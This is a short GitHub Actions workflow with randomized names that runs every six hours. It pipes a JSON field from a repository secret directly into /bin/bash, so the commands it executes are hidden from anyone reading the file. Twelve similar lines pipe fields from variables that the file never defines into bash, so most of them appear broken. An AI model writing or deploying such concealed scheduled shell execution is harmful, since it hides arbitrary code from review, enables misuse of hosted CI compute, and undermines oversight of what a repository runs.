name: weijinshen6789

on:
  workflow_dispatch:
  schedule:
    - cron: '41 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weijinshen6789
        env:
          n330: ${{ secrets.n330 }}
        run: |
          echo $n330 | jq -r .rbei0285 | /bin/bash
          echo $ant20262 | jq -r .jea3 | /bin/bash
          echo $iif5419 | jq -r .mdacs35209 | /bin/bash
          echo $s13 | jq -r .d0753 | /bin/bash
          echo $fcaqo313 | jq -r .khmdc65557 | /bin/bash
          echo $kogdl107 | jq -r .hn4617 | /bin/bash
          echo $t10990 | jq -r .y666 | /bin/bash
          echo $mnn9 | jq -r .m71 | /bin/bash
          echo $qhtf93 | jq -r .udz54444 | /bin/bash
          echo $ivjhj4 | jq -r .agj8076 | /bin/bash
          echo $tkr6468 | jq -r .grq6 | /bin/bash
          echo $jz58657 | jq -r .ldpmr92212 | /bin/bash
          echo $loj2 | jq -r .nvss22947 | /bin/bash

